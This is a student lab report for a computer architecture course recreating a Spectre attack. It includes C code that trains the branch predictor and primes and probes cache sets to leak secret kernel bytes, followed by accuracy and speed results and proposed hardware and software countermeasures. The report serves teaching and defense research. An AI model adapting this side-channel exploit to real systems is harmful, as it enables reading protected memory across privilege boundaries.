# CS152 Lab 3 Open Section
Richard Yan, Edison Wang
*4.2 Recreating Spectre Attacks*
### Code
```c
#include <stddef.h>
#include <unistd.h>
#include <stdio.h>
static inline void leak(size_t index, int shift) {/* skipped */}
static inline unsigned long get_cycles(void) {/* skipped */}
static inline void printx(unsigned char x) {/* skipped */}
uint8_t *flusher;
// mem addr: [tag] [set (6)] [byte offset (6)]
// leak_array[0] is set 000100 = 4
// leak_array[64] is set 5
#define SET0 4
#define SET1 5
static void read_memory_byte(size_t malicious_x) {
uint8_t result = 0;
for (uint8_t b = 0; b < 8; b++) {
long bit_scores[2] = {0, 0};
unsigned long bit_results[2] = {0, 0};
#pragma GCC unroll 21
for (uint8_t tries = 0; tries < 21; tries++) {
// register unsigned long c_sum;
register unsigned long c;
register unsigned long c_sum = 0;
register unsigned long c_sum2 = 0;
// TRAIN
leak(0, 0);
leak(0, 0);
leak(0, 0);
leak(0, 0);
leak(0, 0);
leak(0, 0);
leak(0, 0);
leak(0, 0);
// PRIME
volatile register uint8_t probe;
probe = flusher[0 * 4096 + SET0 * 64];
probe = flusher[0 * 4096 + SET1 * 64];
probe = flusher[1 * 4096 + SET0 * 64];
probe = flusher[1 * 4096 + SET1 * 64];
probe = flusher[2 * 4096 + SET0 * 64];
probe = flusher[2 * 4096 + SET1 * 64];
probe = flusher[3 * 4096 + SET0 * 64];
probe = flusher[3 * 4096 + SET1 * 64];
// EXPLOIT
leak(malicious_x, b);
// PROBE
// we want to check all 4 ways
// set 5 first
register uint8_t *addr = &flusher[SET1 * 64];
c = get_cycles();
probe = *addr;
c_sum2 += get_cycles() - c;
addr += 4096;
c = get_cycles();
probe = *addr;
c_sum2 += get_cycles() - c;
addr += 4096;
c = get_cycles();
probe = *addr;
c_sum2 += get_cycles() - c;
addr += 4096;
c = get_cycles();
probe = *addr;
c_sum2 += get_cycles() - c;
addr -= 12352;
// now set 4
c = get_cycles();
probe = *addr;
c_sum += get_cycles() - c;
addr += 4096;
c = get_cycles();
probe = *addr;
c_sum += get_cycles() - c;
addr += 4096;
c = get_cycles();
probe = *addr;
c_sum += get_cycles() - c;
addr += 4096;
c = get_cycles();
probe = *addr;
c_sum += get_cycles() - c;
unsigned long sgn = (c_sum - c_sum2) >> 63;
bit_results[0] += 1 - sgn;
bit_results[1] += sgn;
if (bit_results[0] >= 11) break;
if (bit_results[1] >= 11) break;
} // tries
if (bit_results[1] > bit_results[0]) { // 1 evicted
result |= (1 << b);
}
}
printx(result);
}
int main(void) {
uint8_t flusher_region[512 * 64]; // 256 cache lines, 64 bytes each
// align flusher to dcache boundary
flusher = (uint8_t *) (((size_t) &flusher_region[0] + 255 * 64) / (256 * 64) * (256 * 64));
size_t leak_addr = 0x80015100L;
size_t secret_addr = 0x8000b000L;
for (int i = 0x00; i < 0x80; i++) {
read_memory_byte(secret_addr - leak_addr + i);
}
return 0;
}
```
Shown above is the 21 tries/bit variant.
#### The setup process:
- We first allocate a known memory region with 4 times the size of the L1 D cache, also aligned to the start of the cache (so that the last 12 bits of the 0th element's address are all zeros).
- We determine the address of `leak_array` and the address of `secret`. From disassembly, `leak_array[0]` has cache index `0b000100 = 4`, `leak_array[64]` has cache index `0b000101 = 5`. We therefore know the sets the cache covert channel communicates through.
- For each secret byte, we determine the malicous `x` value by calculating the address difference between the target byte and the leak array address.
- We know that the first memory access in `sys_leak` (`leak_array[x]`) will not interfere with our probing. This is because:
- During training, `x` is always fed as 0. This access maps to set 0 and does not interfere with sets 4 and 5, where we are probing.
- During the exploit, `leak_array[x]` points to somewhere in the secret data range. We already know `.data.secret` starts at `0x8000b000` and ends at `0x8000b080`. The span is 2 cache lines mapping to set 0 and set 1, and therefore also does not interfere with our probing.
#### The probe process:
- For each byte, we go over each of its 8 bits in order.
- For each bit, we try 21 times (or any odd number of times) to guess its value.
- TRAIN: We first train the branch predictor in `sys_leak` by calling with correct arguments 8 times.
- PRIME: for sets 4 and 5 we map all 4 ways to regions in the `flusher`, in 4KB intervals. This is deliberately not in a loop so as to not affect the branch predictor with loop condition branches.
- EXPLOIT: we call with malicious x value and the current bit shift. During speculative execution, either `leak_array[0]` or `leak_array[64]` gets accessed, the former evicting a way in set 4, the latter set 5.
- PROBE: we time memory access time for all 4 ways for set 5, then set 4. Address calculation done before recording the cycle count, the only operation timed is a pointer dereference.
- Access times for all 4 ways are summed for each set then compared. The higher set gets a point.
- Early termination is performed if we have high enough scores for a particular value.
- At the end, the value with the highest score wins. If the bit is determined to be a 1, the `result` byte has that bit flipped. After all 8 bits, the `result` byte holds the best guess and is outputted.
#### Room for improvements:
- Earlier termination:
- If say the first 5 tries are all for one value, we might be confident enough already and need not get to majority. This saves cycles with little cost in accuracy.
- Less `sys_leak` calls during training:
- Self explanatory - might not need 8 training calls.
- Could adapt for non-hardcoded memory locations.
### Difficulties
- Cache ways
- Originally did not notice we had 4 ways per set. Primed all sets with only 1 way didn't work. Checked the config to verify we have 64 sets with 4 ways.
- Set specific flush
- The code flushed the entire cache every time for the PRIME step originally, which took forever. Since we are only operating on sets 4 and 5, changing the flush code to flush only these 2 sets led to a much faster runtime.
- Eviction detection
- When results were wrong, we weren't sure if eviction detection is failing, or if the exploit/training failed. To test this, the test is copied to baremetal, syscalls removed, and the exploit call replaced with a memory access to some other array that maps to `leak_array[0]` or `leak_array[64]`. Checking if the results were in line with that access helped rule out eviction detection as a point of failure.
- Fence
- We thought that the `fence` instruction was a good idea to count cycles with less external influences. It wasn't.
- Comparing cycle counts
- Originally, cycle counts were summed for all tries before they are compared. This was bad in two ways: 1. sometimes an outlier can drastically skew the sums and 2. does not easily allow early termination. Switching to a score-based system alleviated the 2 problems.
- Memory access pattern
- We originally probed set 4 first, then set 5. It looked like cycle counts were always less for set 5 when nothing is evicted, so we interleaved 4 and 5 with 4 first. The bias persisted. Our guess is that there exists a next cache line prefetching mechanism. The [SonicBOOM](https://carrv.github.io/2020/papers/CARRV2020_paper_15_Zhao.pdf) paper section 8.2 also mentioned a small L1 cache next-line prefetcher. As a result, all set 5 probes are done first.
- Unrolling
- We unrolled most loops fearing that the branch instruction might interfere with the probe. Did it help? Probably not. But there's no harm in doing that.
### Speed
13 tries/bit: **64329510** cycles for all 128 bytes = **502574** cycles/byte
21 tries/bit: **95923915** cycles for all 128 bytes = **749406** cycles/byte
29 tries/bit: **132128932** cycles for all 128 bytes = **1032257** cycles/byte
Under 1 GHz & 21 tries/bit, we are looking at just under 1 second for 128 bytes.
### Accuracy
#### Byte accuracy
13 tries/bit: 41 byte errors = 67.97% accuracy
21 tries/bit: 6 byte errors = 95.31% accuracy
29 tries/bit: 4 byte errors = 96.88% accuracy
#### Bit accuracy
13 tries/bit: 45 bit errors = 95.6% accuracy
21 tries/bit: 6 bit errors = 99.4% accuracy
29 tries/bit: 4 bit errors = 99.6% accuracy
### Countermeasures
#### Hardware
- Disable speculation under s-mode or m-mode, or add a privileged instruction to toggle speculation.
- Easy to add a switch
- Hurts kernel performance
- Use a victim-cache-like data structure to hold evicted lines during speculation, and restore them on branch mispredict. Cache lines will need to carry a branch tag to determine which branch they were speculatively loaded under.
- Very difficult to implement, uses more hardware
- Less performance hit
- Add enough jitter to user-mode hardware performance counters.
- Might have proper usages and affect existing applications
- Easy to implement and might be helpful in mitigating other timing attacks
- Kernel-specific cache.
- More hardware, need additional cache coherency
- Relatively easy to implement
#### Software
- Hint the compiler for all kernel/security-critical conditions (especially boundary checking) always predict "not taken". This eliminates speculation.
- Hardware might not support taking branch hints
- Need to manually go through every branch, potentially a large job
- Little complications aside from performance
- Recompile the kernel with no speculative execution.
- Hardware might not support speculation toggle
- Hurts kernel performance
- Easy to do
- Explicit pointer sanitization: e.g. for this case, first do `x = x & 0xfff` before indexing into the array.
- Does not cover all cases (though branch predicates might help)
- Requires manual review for each case
- For cases that does apply, there is little to no performance penalty